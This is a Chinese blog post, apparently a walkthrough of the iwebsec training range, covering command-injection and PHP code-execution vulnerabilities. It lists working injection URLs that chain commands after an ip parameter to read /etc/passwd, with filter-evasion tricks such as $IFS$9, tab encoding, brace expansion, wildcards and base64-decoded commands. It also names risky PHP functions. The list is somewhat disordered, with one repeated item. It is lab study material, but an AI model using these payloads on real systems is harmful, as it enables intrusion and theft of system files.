iwebesc通关笔记

于 2024-07-04 08:55:58 发布
阅读量792 收藏 26
点赞数 30
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jilinyi/article/details/140169169
版权

命令执行是网络安全领域中一项具有挑战性的任务。在 iwebesc 靶场中,我需要深入理解系统的工作原理、命令的语法和参数,以及各种可能的漏洞利用方式。通过不断的尝试和错误,我逐渐掌握了如何识别潜在的命令注入点,并巧妙地构造有效的命令来获取所需的信息或达到特定的目标。

在这个过程中,耐心和细心是至关重要的。每一个字符、每一个参数的设置都可能影响到命令的执行效果。同时,对于各种常见的操作系统和服务器环境的了解,也为我在命令执行的探索中提供了有力的支持。

而代码执行的挑战则更上一层楼。这不仅要求对编程语言的语法和特性有深入的掌握,还需要具备敏锐的漏洞发现能力。我学会了仔细分析目标代码的逻辑结构,寻找可能被利用的输入点和执行路径。通过巧妙地构造恶意的输入数据,触发代码中的漏洞,从而实现非预期的代码执行效果。

此外,团队合作在这次通关过程中也发挥了重要作用。与队友们的交流和分享,让我能够从不同的角度思考问题,借鉴他人的经验和技巧,共同攻克难题。

通过这次 iwebesc 靶场的通关经历,我深刻认识到网络安全领域的复杂性和挑战性。不断学习和更新知识,提高自己的技术水平和思维能力,是在这个领域中保持竞争力的关键。同时,也更加明白了安全防范的重要性,只有不断加强系统的安全性,才能有效抵御各种潜在的威胁。

未来,我将继续深入研究网络安全技术,不断提升自己在命令执行和代码执行等方面的能力,为保障网络环境的安全贡献自己的一份力量。

iwebsec靶场 命令执行漏洞

一、命令执行漏洞
1.执行系统命令

5.使用$IFS$9
  • bash下,可以用$IFS$9代替空格

/exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

2.查看系统文件

/exec/01.php?ip=127.0.0.1;cat%20/etc/passwd

二、命令执行漏洞空格绕过

1.执行不需要空格的命令

/exec/02.php?ip=127.0.0.1;ifconfig

2.使用%09
  • %09TAB键的url编码​​/exec/02.php?ip=127.0.0.1;cat%09/etc/passwdurl编码​​
  • 3.使用<
  • <表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。命令 < 文件,这是将文件作为命令输入。

  • /exec/02.php?ip=127.0.0.1;cat</etc/passwd

  • 4.使用{},
  • {}内是整体的命令,逗号就是空格的作用
  • /exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}
  • 5.使用$IFS$9
  • bash下,可以用$IFS$9代替空格

  • /exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

三、命令执行漏洞关键命令绕过

1.拼接绕过

(2)命令替换绕过

实战1: http://www.iwebsec.com:81/exec/03.php?ip=127.0.0.1;sh%20/etc/passwd%202%3E%261

实战2:http://www.iwebsec.com:81/exec/03.php?ip=127.0.0.1;more%20/etc/passwd

 实战3: http://www.iwebsec.com:81/exec/03.php?ip=127.0.0.1;head%20/etc/passwd

实战4:http://www.iwebsec.com:81/exec/03.php?ip=127.0.0.1;sort%20/etc/passwd

四、命令执行漏洞通配符绕过

  • 使用通配符*替代某些字符

/exec/04.php?ip=127.0.0.1;cat%20/et*/passw*

五、命令执行漏洞base64编码绕过

  • 将命令进行base64编码

/exec/05.php?ip=127.0.0.1;`echo%20aWQK|base64%20-d`

iwebsec(代码执行)

  • 代码执行漏洞eval函数

1.eval函数

二、代码执行漏洞assert函数
1.assert函数

三、代码执行漏洞call_user_func函数
1.call_user_func函数
  • call_user_func_array()是调用回调函数,可以将把一个数组参数作为回调函数的参数

四、代码执行漏洞call_user_func_array函数
1.call_user_func_array函数
  • call_user_func_array 调用回调函数,并把一个数组参数作为回调函数的参数

五、代码执行漏洞create_function函数
1.create_function函数
  • create_function()PHP中的内置函数,用于在PHP中创建匿名(lambda-style)函数

六、代码执行漏洞array_map函数
1.array_map函数
  • array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。
  • 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致

七、代码执行漏洞preg_replace函数
1.preg_replace函数
  • preg_replace 函数执行一个正则表达式的搜索和替

八、可变函数漏洞

jilinyi
关注
  • 30
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ZVulDrill靶场通关笔记
weixin_41487522的博客
12-07 1951
ZVulDirll靶场通关笔记 由于读研期间在忙论文的事情,好久没更新了,今天分享一下ZVulDirll靶场通关。 这个靶场是我在观看web安全相关课程教学视频的时候发现的,靶场很简单,实用于新手小白学习入门,下面就是该靶场通关笔记。 1.下载地址: github上源地址下载:https://github.com/710leo/ZVulDrill 2.环境搭建及安装: 环境搭建的话,推荐使用phpstudy,非常的方便,因为phpstudy集成了Apache+PHP+MySQL+phpMyAdmin+Z
iwebsec代码执行
果粒程
03-04 684
iwebsec代码执行
iwebsec靶场 命令执行漏洞通关笔记
mooyuan的博客
11-25 3171
iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞
命令执行漏洞 | iwebsec
weixin_52116519的博客
02-26 2719
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。【摘自《web安全攻防》】管道符作用举例直接执行后面的命令。||前面执行的命令执行出错才执行后面的语句。前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。&&
iwebsec靶场(命令执行
果粒程
03-03 484
iwebsec靶场(命令执行
iwebsec--命令执行漏洞
追求卓越,技术流~
12-04 978
WINDOWS系统支持的管道符 “|”:直接执行后面的语句 例如:ping www.baidu.com|whoami “||”:如果前面执行的语句执行出错,则执行后面的语句 例如:png www.baidu.com||whoami “&”:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 例如:png www.baidu.com&whoami或者ping www.baidu.com&whoami “&&”:如果前面的语句为真先执行第一个命令后执行第二个命令;为假则直接出错,也不执行后面的语句 例如
软考中级软件设计师 法律法规通关笔记
最新发布
05-18
记录了近10年软考中级软件设计师考试中的法律法规常考选择题知识点
CISSP通关笔记(202008更新,推荐).zip
02-17
202008更新的CISSP通关笔记,应该是针对考试大纲的最新变化进行了详尽的解释和解析。 一、安全与风险管理 这一部分主要探讨如何识别、评估和管理组织的信息安全风险。知识点包括风险管理框架、威胁建模、风险分析...
DVWA 共12关通关笔记
09-12
【DVWA 共12关通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
面试通关:史上最全的Spring高级源码笔记.zip
03-06
主要课程内容 Spring 概述(基本情况) 核⼼思想 IoC 和 AOP ⼿写实现 IoC 和 AOP(⾃定义spring框架) Spring IoC ⾼级应⽤ 基础知识 ⾼级特性 ...必要的笔记、必要的图、通俗易懂的语⾔化解知识难点
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 912
命令执行漏洞
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场
网络安全领域___专研者.
04-24 2901
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec靶场(XSS)
果粒程
03-05 704
iwebsec靶场(XSS)
web Sec
kkwant的博客
11-27 217
课程大纲介绍及实验环境部署 暴力破解原理和测试流程 基于表单的暴力破解实验演示及burpsute使用介绍 验证码绕过-on client相关问题 验证码绕过之服务端相关问题 暴力破解防范措施和防范误区 xss基本概念和原理介绍 xss绕过思路讲解和案例演示 xss之HTMLspecialchars绕过演示 xss防范措施及href和js输出点的案例演示 从一个基础的反射性xss来进一步认识...
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
mooyuan的博客
04-20 1453
前言。
iwebsec靶场 中间件漏洞通关笔记3-Jboss中间件漏洞
mooyuan的博客
04-21 1235
JBoss是一套开源的企业级Java中间件系统,用于实现基于SOA的企业应用和服务,基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
iwebsec靶场(XXE漏洞
果粒程
03-07 852
iwebsec靶场(XXE漏洞
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2274
iwebsec靶场,SQL注入篇,详细过程,全篇完结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值